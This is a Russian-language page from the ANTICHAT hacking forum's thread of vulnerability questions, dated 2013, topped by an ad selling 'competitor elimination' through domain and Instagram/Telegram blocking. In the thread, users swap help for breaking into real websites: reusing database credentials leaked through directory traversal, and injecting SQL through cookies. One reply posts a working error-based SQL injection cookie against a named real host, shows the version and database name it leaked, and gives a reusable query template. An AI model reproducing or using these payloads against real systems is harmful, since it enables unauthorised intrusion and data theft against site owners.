УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 2214 из 2438

2214

Опции темы

Поиск в этой теме

Опции просмотра

#22131

02.03.2013, 14:42

Melfis

Guest

Сообщений: n/a

Провел на форуме:
195266

Репутация: 53

panfilov1991, ссылка у тя http://твой_сайт.***/server

а скуль в куках. Лог то смотри

#22132

02.03.2013, 17:34

kacergei

Новичок

Регистрация: 26.05.2007

Сообщений: 8

Провел на форуме:
23906

Репутация: -5

погуглил так ничего и ненашел чем можно автоматизировать работу с Expression Language Injection, есть какой нибудь софт? а лучше несколько)

#22133

02.03.2013, 17:51

zloy_fantom

Guest

Сообщений: n/a

Провел на форуме:
15180

Репутация: 0

Продолжаю "раскручивать" сайт с помощью directory traversal (пока только этот метод мне более-менее понятен).

Нашел следующий скрипт sql.php:

Код:

Code:

Т.е. знаю имя базы данных, имя юзера и пароль. sql_ip мне не поможет, поскольку он внутренний. Как можно подключиться к базе данных, используя эти данные?

Спасибо

#22134

02.03.2013, 17:52

WendM

Guest

Сообщений: n/a

Провел на форуме:
11466

Репутация: 3

zloy_fantom, только если есть шел на уязвимой машине

#22135

02.03.2013, 17:59

Улыбайся

Guest

Сообщений: n/a

Провел на форуме:
18621

Репутация: 3

Кто может подсказать по xss. Напишите пожалуйста в личку.

#22136

02.03.2013, 20:04

panfilov1991

Guest

Сообщений: n/a

Провел на форуме:
6020

Репутация: 0

Цитата:

Сообщение от Melfis

Melfis said:
panfilov1991
, ссылка у тя http://твой_сайт.***/server
а скуль в куках. Лог то смотри

В том то и дело, что подставлял как только можно, но выводит ошибку типа страницы не найдено!

#22137

02.03.2013, 21:02

cat1vo

Новичок

Регистрация: 12.08.2009

Сообщений: 1

Провел на форуме:
11937

Репутация: 0

panfilov1991

В том же Акунетиксе, через который вы нашли данную уязвимость, есть Blind SQL Editor, Вам, вера не позволяет через него работать?

zloy_fantom

Можете попробовать зарегистрироваться на том же хостинге и посмотреть какие данные для доступа к БД они предоставляют и если повезет, сможете зайти под теми данными, что у Вас!

#22138

02.03.2013, 21:03

OxoTnik

Guest

Сообщений: n/a

Провел на форуме:
290351

Репутация: 173

Цитата:

Сообщение от panfilov1991

panfilov1991 said:
В том то и дело, что подставлял как только можно, но выводит ошибку типа страницы не найдено!

Попробуй очисти кукисы, и вообще их отключи в браузере и проверь, либо наобород, редактируй кукис для иньекта

экстрасенсов нет, выложи тут скулю, либо скинь кому нить кто шарит более менее.

#22139

02.03.2013, 21:07

panfilov1991

Guest

Сообщений: n/a

Провел на форуме:
6020

Репутация: 0

Цитата:

Сообщение от cat1vo

cat1vo said:
panfilov1991
В том же Акунетиксе, через который вы нашли данную уязвимость, есть Blind SQL Editor, Вам, вера не позволяет через него работать?
zloy_fantom
Можете попробовать зарегистрироваться на том же хостинге и посмотреть какие данные для доступа к БД они предоставляют и если повезет, сможете зайти под теми данными, что у Вас!

Цитата:

Сообщение от None

помогите

Пожалуйста

#22140

02.03.2013, 21:08

cat1vo

Новичок

Регистрация: 12.08.2009

Сообщений: 1

Провел на форуме:
11937

Репутация: 0

Цитата:

Сообщение от OxoTnik

OxoTnik said:
Попробуй очисти кукисы, и вообще их отключи в браузере и проверь, либо наобород, редактируй кукис для иньекта
экстрасенсов нет, выложи тут скулю, либо скинь кому нить кто шарит более менее.

Что за бред, думать надо хоть не много головой, инъекция в куках, а Вы хотите их отключить? Тут дело в другом, человек совершенно не умеет этим всем пользоваться и работать с тем, что нашел ему сканер, да и по всей видимости, сам не понимает, что хочет.

Все отлично работает, запрос переделал, мне так удобнее...

Код:

Code:
Host: game.parlahost.ru
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cache-Control: max-age=0
Cookie: login=demodemo; pass="or(1)group+by(mid((select+concat_ws(0x3a,version(),schema())),rand(0)|0))having(avg(0))or"

Duplicate entry '5.5.29-1-log:s10parl' for key 'group_key'

Версия - 5.5.29-1-log

Названия Базы Данных - s10parl

"or(1)group+by(mid((СЮДА ВСТАВЛЯЙТЕ СВОЙ ЗАПРОС),rand(0)|0))having(avg(0))or"

Дальше делайте сами, если не знаете как, на форуме есть мануал - ССЫЛКА

З.Ы. Для работы можете пользоваться тем же Acunetix, Burp Suite, Firefox (Live HTTP Headers) или HTTPAnalyzer (я предпочитаю его)!

Страница 2214 из 2438

2214

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 3 (пользователей: 0 , гостей: 3)

Быстрый переход